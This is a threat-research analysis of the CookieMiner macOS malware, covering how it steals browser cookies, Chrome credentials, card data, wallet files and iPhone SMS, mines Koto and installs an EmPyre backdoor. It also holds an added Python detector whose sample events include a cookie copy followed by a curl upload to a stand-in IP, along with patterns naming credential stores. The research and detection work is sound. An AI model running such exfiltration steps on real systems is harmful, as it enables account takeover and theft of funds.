Palo Alto Networks’ Unit 42 recently discovered malware that we believe has been developed from OSX.DarthMiner, a malware known to target the Mac platform.
This malware is capable of stealing browser cookies associated with mainstream cryptocurrency exchanges and wallet service websites visited by the victims.
It also steals saved passwords in Chrome.
Finally, it seeks to steal iPhone text messages from iTunes backups on the tethered Mac.
Based on past attacks like this, we believe the bad actors could bypass multi-factor authentication for these sites by combining the stolen login credentials, web cookies, and SMS data.
If successful, the attackers would have full access to the victim’s exchange account and/or wallet and be able to use those funds as if they were the user themselves.
The malware also configures the system to load coinmining software on the system. This software is made to look like an XMRig-type coinminer, which is used to mine Monero. In fact, though, it loads a coinminer that mines Koto, a lesser-known cryptocurrency that is associated with Japan.
Because of the way this malware attacks the cookies associated with exchanges, we have named this malware “CookieMiner”.
In the following sections, we will first briefly introduce some background knowledge, and then dig into the technical details of the malware’s behaviors.
Web cookies are widely used for authentication. Once a user logs into a website, its cookies are stored for the web server to know the login status. If the cookies are stolen, the attacker could potentially sign into the website to use the victim’s account. Stealing cookies is an important step to bypass login anomaly detection. If only the username and password are stolen and used by a bad actor, the website may issue an alert or request additional authentication for a new login. However, if an authentication cookie is also provided along with the username and password, the website might believe the session is associated with a previously authenticated system host and not issue an alert or request additional authentication methods.
A cryptocurrency exchange is a place to trade cryptocurrencies for other assets, such as other digital (crypto)currencies or conventional fiat money. Most modern cryptocurrency exchanges and online wallet services have multi-factor authentication. CookieMiner tries to navigate past the authentication process by stealing a combination of the login credentials, text messages, and web cookies. If the bad actors successfully enter the websites using the victim’s identity, they could perform fund withdrawals. This may be a more efficient way to generate profits than outright cryptocurrency mining. Furthermore, attackers could manipulate the cryptocurrency prices with large-volume buying and/or selling of stolen assets resulting in additional profits.
A rundown of CookieMiner’s behaviors (discussed in more detail in the following sections):
- Steals Google Chrome and Apple Safari browser cookies from the victim’s machine
- Steals saved usernames and passwords in Chrome
- Steals saved credit card credentials in Chrome
- Steals iPhone’s text messages if backed up to Mac
- Steals cryptocurrency wallet data and keys
- Keeps full control of the victim using the EmPyre backdoor
- Mines cryptocurrency on the victim’s machine
The CookieMiner attack begins with a shell script targeting macOS. As shown in Figure 1, it copies the Safari browser’s cookies to a folder, and uploads it to a remote server (46.226.108[.]171:8000). The server hosts the service “curldrop” (https://github[.]com/kennell/curldrop), which allows users to upload files with curl. The attack targets cookies associated with cryptocurrency exchanges that include Binance, Coinbase, Poloniex, Bittrex, Bitstamp, MyEtherWallet, and any website having “blockchain” in its domain name such as www.blockchain[.]com.
Figure 1. Code to steal web cookies
Stealing Credit Cards, Passwords, Wallets and SMS
Apple’s Safari is not the only web browser targeted. Google Chrome also attracts the threat actors’ attention due to its popularity. CookieMiner downloads a Python script named “harmlesslittlecode.py” to extract saved login credentials and credit card information from Chrome’s local data storage (Figure 2).
Figure 2. Malware extracts Chrome’s secret data
CookieMiner adopts techniques from the Google Chromium project’s code for its decryption and extraction operations and abuses them. Google Chromium is an open-source version of the Google Chrome browser. By abusing these techniques, CookieMiner attempts to steal credit card information from major issuers, such as Visa, Mastercard, American Express, and Discover (Figure 3). The user’s saved login credentials are also stolen, including usernames, passwords, and the corresponding web URLs (Figure 4).
Figure 3. CookieMiner extracts credit card information
Figure 4. CookieMiner extracts login credentials
CookieMiner reports all the wallet-related file paths to its remote server so it can later upload the files according to the C2 commands. These files usually include private keys of cryptocurrency wallets. If the victims use iTunes to back up files from iPhone to Mac (which can happen over Wi-Fi), their iPhone text messages (SMSFILE) will also be retrieved by the attackers (Figure 5).
Figure 5. Malware steals wallets, cookies, passwords and SMS
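The behavior described above (reads of Safari cookies, Chrome's local data, wallet files and iTunes backups, followed by a curl upload) can be hunted for in process telemetry. The following Python detector is an added example, not code from Unit 42 or from the malware; the log line format, the five-minute window, the broad "wallet" match and the sample events are constructed assumptions.

```python
import re
from collections import defaultdict

# Stores the article says CookieMiner reads. Patterns are standard macOS
# locations; the broad "wallet" match is an assumption of this example.
SENSITIVE = {
    "safari_cookies": re.compile(r"Cookies\.binarycookies"),
    "chrome_secrets": re.compile(r"Google/Chrome/.*(Login Data|Web Data|Cookies)"),
    "iphone_backup": re.compile(r"MobileSync/Backup"),
    "wallet_files": re.compile(r"wallet", re.I),
}
# curl invocations that send a local file to a remote host.
UPLOAD = re.compile(r"\bcurl\b.*(\s-T\s|--upload-file|\s-F\s|--form)")
WINDOW = 300  # max seconds between the read and the upload (assumed threshold)

def parse(line):
    """Constructed format: '<epoch> <pid> <ppid> <command line>'."""
    ts, pid, ppid, cmd = line.split(" ", 3)
    return int(ts), int(pid), int(ppid), cmd

def detect(lines):
    """Alert on a curl upload that follows sensitive-store reads under the same parent."""
    reads = defaultdict(list)  # ppid -> [(ts, store name)]
    alerts = []
    for ts, pid, ppid, cmd in sorted(map(parse, lines)):
        for name, rx in SENSITIVE.items():
            if rx.search(cmd):
                reads[ppid].append((ts, name))
        if UPLOAD.search(cmd):
            stores = sorted({n for t, n in reads[ppid] if 0 <= ts - t <= WINDOW})
            if stores:
                alerts.append({"ts": ts, "ppid": ppid, "stores": stores, "cmd": cmd})
    return alerts

# Constructed sample events (not taken from the malware or the article's figures).
SAMPLE = [
    "1000 501 400 cp /Users/u/Library/Cookies/Cookies.binarycookies /tmp/stage/",
    "1002 502 400 zip -r /tmp/stage.zip /tmp/stage",
    "1005 503 400 curl --upload-file /tmp/stage.zip http://198.51.100.7:8000",
    "2000 610 600 curl -O https://example.com/installer.pkg",
    "3000 700 650 cp /Users/u/Library/Cookies/Cookies.binarycookies /Volumes/bk/",
    "9000 701 650 curl -T /tmp/report.txt http://198.51.100.7:8000",
]

if __name__ == "__main__":
    for a in detect(SAMPLE):
        print(a["ts"], a["ppid"], a["stores"], a["cmd"])
```

Only the first chain (ppid 400) alerts: the download under ppid 600 is not an upload, and the upload under ppid 650 falls outside the window of the earlier cookie copy.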
CookieMiner issues a series of commands to configure the victim’s machine to mine cryptocurrency and maintain persistence (Figure 6). The program xmrig2 is a Mach-O executable for mining cryptocurrency. As seen in Figure 7, the address “k1GqvkK7QYEfMj3JPHieBo1m7FUkTowdq6H” has considerable mining performance. It has been ranked as a top miner in the Maruru mining pool (koto-pool.work). The cryptocurrency mined is called Koto, which is a Zcash-based anonymous cryptocurrency. The addresses in Figure 8 use the “Yescrypt” algorithm, which is good for CPU miners but not ideal for GPU miners. This is ideal for malware, as the victim hosts are not guaranteed to have discrete GPUs installed in them but are guaranteed to have a CPU available. However, the filename xmrig2 is usually used by Monero miners. We believe the malware authors may have intentionally used this filename to create confusion since the miner is actually mining the Koto cryptocurrency.
Figure 6. CookieMiner mines cryptocurrency
Figure 7. Mining performance of the worker
For persistence and remote control, the script downloads another base64-encoded Python script from hxxps://ptpb[.]pw/OAZG. After several steps of de-obfuscation, we found the attackers using EmPyre for post-exploitation control. EmPyre is a Python post-exploitation agent built on cryptologically-secure communications and a flexible architecture. The attacker is able to send commands to the victim’s machine for remote control. Additionally, the agent checks if Little Snitch (an application firewall) is running on the victim’s host. If so, it will stop and exit.
The malware “CookieMiner” is intended to help threat actors generate profit by collecting credential information and mining cryptocurrency. If attackers have all the needed information for the authentication process, the multi-factor authentication may be defeated. Cryptocurrency owners should keep an eye on their security settings and digital assets to prevent compromise and leakage.
Indicators of Compromise